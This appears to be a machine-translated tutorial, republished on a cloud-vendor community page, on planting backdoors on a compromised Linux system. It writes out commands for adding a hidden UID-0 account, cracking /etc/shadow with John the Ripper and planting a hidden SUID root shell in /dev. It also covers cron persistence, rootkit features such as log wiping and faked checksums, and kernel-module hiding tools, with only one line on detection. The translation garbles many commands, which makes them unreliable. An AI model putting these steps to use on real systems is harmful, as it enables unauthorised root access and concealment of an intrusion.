Linux backdoor knowledge

Source: Internet
Author: User

 

Common basic editing commands:

 

Sed's/src/dst/'file replacement content

Sed '1, 5d 'file deletes a row

Wc-l file: calculates the number of lines in a file.

 

1. Add a Super User Account

Useradd-o-u 0-p "Linux encrypted password" imiyoo

Echo "imiyoo: x: 0: 0: // bin/sh">/ets/passwd

2. Crack the root user password

./John/etc/shadow-show

./John-wordlist = passwd. lst/etc/shadow

3 place SUID Shell

Cp/bin/bash/dev/. rootshell

Chmod a + s/dev/. rootshell // grant suid permission to the program owner

4 Crontab scheduled task

Use the Crontab program to schedule the timed running of installed backdoor programs

Crontab file content format description:

* *** Command

Hour, day, month, and week commands

The 1st column indicates minute 1 ~ 59. Each minute is represented by * or */1.

The first column indicates the hour 1 ~ 23 (0 indicates 0 points)

The 3rd column indicates the date 1 ~ 31

The 4th column indicates the month 1 ~ 12

The Identification Number of column 5th is from day of the week to day ~ 6 (0 indicates Sunday)

6th columns of commands to run

',' Indicates the separation of time, which is composed of multiple time points; '*/6' indicates that the execution is cyclically executed every six units; '-' indicates all the time from a start point to the end point.

The cron service reads not only all files in/var/spool/cron every minute, but also/etc/crontab once. Therefore, we can use this file to configure

The cron service does something. Crontab configuration is intended for a user, and editing/etc/crontab is a system task.

/Sbin/service crond start // start the service

/Sbin/service crond stop // close the service

/Sbin/service crond restart // restart the service

/Sbin/service crond reload // reload the configuration

You can also enable the service automatically when the system starts:

Add:

/Sbin/service crond start

Crontab-l list the current crontab of the current user

5 toolkit Rootkit

Includes a series of system and backdoor tools:

-Clear logon records in logs

-Camouflage checksum

-Replacing netstat, ps, and other network tools

-The backdoor logon program is easy to install and use.

6. loadable kernel module (LKM)

LKM: Loadable Kernel Modules dynamic loading without re-compiling the Kernel.

Intercepts system calls and provides powerful functions such as hiding directories, files, processes, and network connections.

It is easy to discover and conceal itself. The famous LKM packages include adore and knark.

Backdoor Detection

Use Tripwire or md5 verification to check the system. The IDS system monitors suspicious network connections on the target machine.

7. view the release version of Linux

Cat/etc/issue

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.